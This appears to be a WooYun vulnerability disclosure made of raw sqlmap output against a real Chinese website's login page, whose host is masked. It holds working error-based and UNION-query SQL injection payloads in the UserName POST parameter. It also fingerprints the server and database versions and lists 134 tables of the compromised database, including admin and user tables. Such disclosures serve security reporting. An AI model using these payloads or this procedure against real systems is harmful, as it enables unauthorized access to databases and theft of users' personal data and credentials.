WooYun.org

http://**.**.**.**/passport/login.aspx

sqlmap identified the following injection point(s) with a total of 179 HTTP(s) requests:
---
Parameter: UserName (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwULLTE4NjcwMDk4OTkPZBYCZg9kFgICCQ8PFgIeBFRleHQFG+eUqOaIt+WQjeaIluWvhueggemUmeivr++8gWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBQxJbWFnZUJ1dHRvbjIEVuZ6bz00CeUvgNlfm9vRR0UL4g==&UserName=Hguh' AND 6522=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6522=6522) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'Burx'='Burx&UserPassword=&ImageButtonLogin.x=1&ImageButtonLogin.y=1&__EVENTVALIDATION=/wEWBQKcrYWyDAKvruq2CALIk7LNDgLz+OWrDgLSwtXkAqxteLMW5ZsMf3D2yysG5k8u+52m
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: __VIEWSTATE=/wEPDwULLTE4NjcwMDk4OTkPZBYCZg9kFgICCQ8PFgIeBFRleHQFG+eUqOaIt+WQjeaIluWvhueggemUmeivr++8gWRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRBJbWFnZUJ1dHRvbkxvZ2luBQxJbWFnZUJ1dHRvbjIEVuZ6bz00CeUvgNlfm9vRR0UL4g==&UserName=Hguh' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(115)+CHAR(101)+CHAR(120)+CHAR(121)+CHAR(84)+CHAR(102)+CHAR(73)+CHAR(84)+CHAR(81)+CHAR(69)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &UserPassword=&ImageButtonLogin.x=1&ImageButtonLogin.y=1&__EVENTVALIDATION=/wEWBQKcrYWyDAKvruq2CALIk7LNDgLz+OWrDgLSwtXkAqxteLMW5ZsMf3D2yysG5k8u+52m
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

current user:    'thsj'

current database:    'thsj_knowledge'

Database: thsj_knowledge
[134 tables]
+---------------------------+
| Agent                     |
| Article_Comment_Star      |
| ChapterCategories         |
| DV_ChanOrders             |
| Department_New            |
| Department_New            |
| Dv_Admin                  |
| Dv_Appraise               |
| Dv_Badlanguage            |
| Dv_BbsLink                |
| Dv_BbsNews                |
| Dv_BestTopic              |
| Dv_BoardPermission        |
| Dv_BoardPermission        |
| Dv_BookMark               |
| Dv_ChallengeInfo          |
| Dv_Friend                 |
| Dv_GroupName              |
| Dv_GroupUser              |
| Dv_Group_Board            |
| Dv_Group_Class            |
| Dv_Group_Topic            |
| Dv_Group_bbs              |
| Dv_Help                   |
| Dv_Log                    |
| Dv_MedalLog               |
| Dv_MedalLog               |
| Dv_Message                |
| Dv_MoneyLog               |
| Dv_Online                 |
| Dv_Plus_Tools_Buss        |
| Dv_Plus_Tools_Buss        |
| Dv_Plus_Tools_Info        |
| Dv_Plus_Tools_MagicFace   |
| Dv_Qcomic                 |
| Dv_Setup                  |
| Dv_SmallPaper             |
| Dv_Space_skin             |
| Dv_Space_user             |
| Dv_StyleHelp              |
| Dv_TableList              |
| Dv_Templates              |
| Dv_Topic                  |
| Dv_Upfile                 |
| Dv_UserAccess             |
| Dv_UserGroups             |
| Dv_User_old               |
| Dv_User_old               |
| Dv_Vote                   |
| Dv_VoteUser               |
| Dv_banzhu_config          |
| Dv_banzhu_log             |
| Dv_banzhu_user            |
| Dv_bbs1                   |
| Dv_notdownload            |
| Oblog_Verifiydata         |
| TH_APermission            |
| TH_ArticleCategories_Base |
| TH_ArticleCategories_Base |
| TH_Article_Base           |
| TH_Article_Base           |
| TH_BookCategories         |
| TH_BookCategories         |
| TH_BookLog                |
| TH_BookType               |
| TH_Comment                |
| TH_Message                |
| TH_PersonStyle            |
| TH_Rss                    |
| TH_Start                  |
| TH_UpLoad                 |
| TH_helpCategories         |
| TH_helpCategories         |
| dtproperties              |
| dv_address                |
| dv_sql_log                |
| oBlog_usertags            |
| oblog_AlbumComment        |
| oblog_AlbumComment        |
| oblog_SpecialList         |
| oblog_SpecialList         |
| oblog_admin               |
| oblog_arguelist           |
| oblog_arguelist           |
| oblog_blogstar            |
| oblog_blogteam            |
| oblog_calendar            |
| oblog_comment             |
| oblog_config              |
| oblog_digg                |
| oblog_friend              |
| oblog_friendurl           |
| oblog_groups              |
| oblog_logclass            |
| oblog_logclass            |
| oblog_logvotes            |
| oblog_message             |
| oblog_myurl               |
| oblog_notdownload         |
| oblog_obcodes             |
| oblog_pm                  |
| oblog_roles               |
| oblog_setup               |
| oblog_skinclass           |
| oblog_subject             |
| oblog_syslog              |
| oblog_sysskin             |
| oblog_tags                |
| oblog_teampost            |
| oblog_teampost            |
| oblog_teamskin            |
| oblog_teamusers           |
| oblog_trackback           |
| oblog_upfile              |
| oblog_url                 |
| oblog_userclass           |
| oblog_userclass           |
| oblog_userdigg            |
| oblog_userdir             |
| oblog_userskin            |
| sysconstraints            |
| sysdiagrams               |
| syssegments               |
| thsj_user                 |
| thsj.ArticleSubscribe     |
| thsj.Article_Book_Log     |
| thsj.Book_Comment_Star    |
| thsj.Book_Log             |
| thsj.Suggests             |
| thsj.TH_ArticleClass      |
| thsj.TH_page              |
| thsj.UserCV               |
| thsj.view_SystemUser      |
| thsj.view_oa_admin        |
+---------------------------+